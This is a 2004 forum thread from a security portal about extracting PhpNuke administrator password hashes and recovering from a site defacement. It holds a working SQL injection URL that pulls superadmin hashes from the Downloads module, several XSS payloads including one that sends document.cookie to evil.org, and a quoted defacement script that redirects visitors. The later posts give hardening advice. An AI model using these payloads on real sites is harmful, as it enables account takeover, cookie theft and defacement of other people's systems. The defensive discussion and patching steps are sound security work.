Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
March 28, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 713
Members: 0
Total: 713
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpNuke -> how to get target password's md5 hash Goto page 1, 2  Next
Post new topic  Reply to topic View previous topic :: View next topic 
how to get target password's md5 hash
PostPosted: Thu May 27, 2004 9:20 am Reply with quote
Saladin
Regular user
Regular user
 
Joined: May 26, 2004
Posts: 19




how can i get password md5 from phpnuke web sites


i only know one way to get md5 through Downloads Module,

here is your http://www.waraxe.us/?modname=sa&id=027 report

modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0, 0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/ **/radminsuper=1/**/LIMIT/**/1/*



is there other ways to get md5?

what is if the Downloads Module is not avaiable or is not active? Can i get md5 through other Modules?


@waraxe, help me please, it is so important
View user's profile Send private message
xss code here
PostPosted: Thu May 27, 2004 10:13 am Reply with quote
Saladin
Regular user
Regular user
 
Joined: May 26, 2004
Posts: 19




An other Question,

[xss code here] ( you always write in your texts,but you give no examples)


What a code is that? maybe you write some examples?
View user's profile Send private message
*sigh*
PostPosted: Thu May 27, 2004 10:33 am Reply with quote
icenix
Advanced user
Advanced user
 
Joined: May 13, 2004
Posts: 106
Location: Australia




googles the best friend here, once again ...
search for XSS Codes or stuff like that
or make your own...

if the <script> tags arenot blocked then you could parse something like
Code:

shit'><script>alert(document.cookie)</script>


if that gets blocked then you can always retry the same sort of query
which will give you:
Code:

foobar'><body onload=alert(document.cookie);>


or be creative...

Code:

wateva'><img src="&{alert('CSS Vulnerable')};">
or
f00'><script>document.write('<img src="http://evil.org/'+document.cookie+'") </script>


experiment...
i suggest this site

Hope i helped
ice

_________________
=[WWW.WARAXE.US]=
-Forum Rules
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Thu May 27, 2004 3:18 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Icenix was bringing good examples here, so i just say - learn, practice, discover,
enjoy success - and never dont think - "I know all i wanted to know"!
There are always new skills to master, learning is neverending process...

About other methods of getting the md5 hash - read my advisories about
phpnuke sql injections, like:

http://www.waraxe.us/?modname=sa&id=003

or you can use XSS to steal cookie with base64encoded md5 hash:

http://www.waraxe.us/?modname=sa&id=002
http://www.waraxe.us/?modname=sa&id=005
http://www.waraxe.us/?modname=sa&id=016
http://www.waraxe.us/?modname=sa&id=023
... etc ...
View user's profile Send private message Send e-mail Visit poster's website
My Site is hacked
PostPosted: Thu May 27, 2004 6:30 pm Reply with quote
Saladin
Regular user
Regular user
 
Joined: May 26, 2004
Posts: 19




My Site got hacked.

The hacker had changed nuke_config Table

INSERT INTO `nuke_config` VALUES ('Hacked By HotHackers Team</title><script language="Javascript">document.location.href="http://hackedby.hothackers.com/?site=mysite.org"</script>', 'http://www.mysite.org', 'logo.gif', '.......


So is this XSS ? what has the attacker used? and how he could add new code in my DB ..


Last edited by Saladin on Sun May 30, 2004 7:43 pm; edited 2 times in total
View user's profile Send private message
hi
PostPosted: Thu May 27, 2004 6:32 pm Reply with quote
Saladin
Regular user
Regular user
 
Joined: May 26, 2004
Posts: 19




and an other question, you think he has used the News Module to add JavaScript Code ?

I am not sure, but i think, my News Module is not so safe
View user's profile Send private message
PostPosted: Thu May 27, 2004 9:39 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




First attackers somehow were getting superadmin status (through sql injection probably). Then they just were using from administration menu
an option called "Preferences" and there were inserting "hacked" message and scripting stuff to "Site name" field. What is interesting, is that phpnuke should be filtering "<script>" tags from POST query and stop the pageload with "The html tags you attempted to use are not allowed" message.
One way to bypass that filter is using of the cookie variables to deliver the scripting stuff to phpnuke engine.

Now about defacers:

First, their WHOIS info:

    Registration Service Provided By: NameCheap.comContact: support@NameCheap.comVisit: http://www.namecheap.com/ Domain name: HOTHACKERS.COMRegistrant Contact: HOTHACKERS HH TEAM (thcteam_@hotmail.com) +1.5641165647 Fax: no 955 Paris, NA 54114 FRAdministrative Contact: HOTHACKERS HH TEAM (thcteam_@hotmail.com) +1.5641165647 Fax: no 955 Paris, NA 54114 FRTechnical Contact: HOTHACKERS HH TEAM (thcteam_@hotmail.com) +1.5641165647 Fax: no 955 Paris, NA 54114 FRBilling Contact: HOTHACKERS HH TEAM (thcteam_@hotmail.com) +1.5641165647 Fax: no 955 Paris, NA 54114 FRStatus: LockedName Servers: dns1.name-services.com dns2.name-services.com dns3.name-services.com dns4.name-services.com dns5.name-services.com Creation date: 28 Dec 2003 20:00:13Expiration date: 28 Dec 2006 20:00:13


Nothing interesting, only email address for possible counteraction.
Then i was doing little research on their website and found one little flaw: "server-info" is available worldwide:

http://www.hothackers.com/server-info
View user's profile Send private message Send e-mail Visit poster's website
hi
PostPosted: Fri May 28, 2004 4:49 pm Reply with quote
Saladin
Regular user
Regular user
 
Joined: May 26, 2004
Posts: 19




Is it possible to add JavaScript without getting SuperAdmin?

i don't believe that they got superadmin
rights, i think, they have added the JavaScript Code directly or ? what dou you think?

although I had changed my password, and i had deleted the admin folder from the server, the attacker could add his javascript onLoad to link my site to other directory.. how is it possible? i deleted the admin directory, but another time my site was hacked, and the same attacker had added again the JS Code on Load

_________________
Freedom for Kurdistan
View user's profile Send private message
once again
PostPosted: Fri May 28, 2004 4:51 pm Reply with quote
Saladin
Regular user
Regular user
 
Joined: May 26, 2004
Posts: 19




Another maybe easy question, if i remove all the admin folder from the server, is it then passible to hack a phpnuke site and to add new news or JS Code ?


how can i protect my site surely?

_________________
Freedom for Kurdistan
View user's profile Send private message
PostPosted: Fri May 28, 2004 5:32 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Maybe you have installed some custom modules with security holes. For example Coppermine Photogallery. If attacker can sploit remote file inclusions, then they can do what they want - modify database, delete files, etc. And that without "admin" folder at scripts at all!
So here is my suggestion -

1. back up your database.
2. delete all scripting stuff from website (to be sure, that there are no backdoors left by crackers).
3. get yourself decently and securely patched phpnuke version.
Look at those php security related sites for download(s):

http://www.nukecops.com

http://www.karakas-online.de/forum/viewforum.php?f=1

http://protector.warcenter.se/

4. when you have installed phpnuke main part, then next try to
search add-on modules, you needed, but be sure, that they are known to be secure versions. I mean - do search on bugtraq, ask for advise in forums (like here), etc.

5. install Fortress, UnionTap, whatever you prefer, to automatically catch up the intruder, ban his ip address and send yourself email about intrusion attempt.

6. Consider to secure your admin.php script with help of the allowed/restricted ip addresses/ranges list. There are addons/mods/scripts for this, do a search on google.

7. and finally, when you have all this done, you can ask your friend or hire some IT security freak to pentest your website.
View user's profile Send private message Send e-mail Visit poster's website
hrmm
PostPosted: Sat May 29, 2004 6:40 am Reply with quote
icenix
Advanced user
Advanced user
 
Joined: May 13, 2004
Posts: 106
Location: Australia




maybe change the core values of the body (etc)
and instead of

Code:

http://localhost.com/admin.php


maybe

Code:

http://localhost.com/secretfolder/admin.php


that would stop some attacks i presume?
only for Admin.php though...
modules.php would still be vulnerable and i dont see how you could masquerade that without some serious coding Wink

just a suggestion....

_________________
=[WWW.WARAXE.US]=
-Forum Rules
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Sat May 29, 2004 11:51 am Reply with quote
SteX
Advanced user
Advanced user
 
Joined: May 18, 2004
Posts: 181
Location: Serbia




Than all your users must go to http://localhost.com/secretfolder to see index.php ,and attacker know where is admin.php ...

And there is Full path disclosure Smile

_________________

We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
-------------------------------------------------------
View user's profile Send private message
PostPosted: Sat May 29, 2004 2:07 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




No, because only administration stuff goes to secret folder and only admins willl have to access it. All common users will not know about admin directory location at all. And if someone will know admins directory path, then probably it is relative path, not full, therefore it will be relative path disclosure Wink
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Tue Jun 15, 2004 9:27 am Reply with quote
wumaxtreme
Beginner
Beginner
 
Joined: Jun 15, 2004
Posts: 1




Visita esta web, ahi tiene una proteccion para el archivo admin.php
espero les sirva.
el link es:

http://www.desarrollonuke.org/documentos-32.html

*****************
It visits this web, there he/she has a protection for the file admin.php
I wait it serves them.
the link is:

http://www.desarrollonuke.org/documentos-32.html

PD: excuse my English, but I am using a translator
**************
View user's profile Send private message
PostPosted: Mon Nov 29, 2004 7:01 pm Reply with quote
Oguz
Regular user
Regular user
 
Joined: Nov 29, 2004
Posts: 7




oh, i need that. thanx
View user's profile Send private message
how to get target password's md5 hash
  www.waraxe.us Forum Index -> PhpNuke
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 2  
Goto page 1, 2  Next
  
  
 Post new topic  Reply to topic  




Powered by phpBB © 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.144 Seconds